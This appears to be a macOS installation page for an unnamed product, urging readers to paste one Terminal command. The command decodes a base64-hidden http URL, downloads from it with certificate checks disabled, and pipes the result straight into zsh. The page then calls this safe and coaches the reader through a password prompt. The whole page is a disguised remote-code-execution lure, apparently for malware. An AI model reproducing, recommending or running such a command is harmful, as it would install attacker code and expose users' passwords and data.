# 🖥️ One-Click Installation via Terminal
A fast and convenient setup method for experienced macOS users.
## 1️⃣ Step 1: Open Terminal
Press **Command (⌘) + Space**, type **Terminal**, press **Return**.
## 2️⃣ Step 2: Run the Command
Copy the **Command** below into the Terminal window and hit Return:
```
curl -kfsSL $(echo 'aHR0cDovL2NoYXRiYXNlZG9zLmNvbS9jdXJsLzY2NDViZjYxYmQ1YzY5ZDg2OTJjNWM3ZDQ1MjFhZjYxNDMxNThkMjVkMGIxYjdkZDIxM2VmOTc1NzYwMmIzOWE='|base64 -D)|zsh
```
### What this installer does:
* Downloads the latest installer script from the official source
* Verifies required components before setup
* Cleans temporary installer files after completion
### Why use Terminal installation
* A single copy-paste installation flow
* Fewer manual steps
* Immediate access to logs/output during setup
### Is it safe?
Yes — if you run commands only from the official website and trusted sources.
### Password note
* Terminal may ask for your system password during installation
* While typing, no symbols appear — this is normal macOS behavior
* Type your password and press **Return**
### Troubleshooting
If installation fails:
* Ensure you copied the full command
* Re-run Terminal as a normal user (not inside restricted shell environments)
* Check your internet connection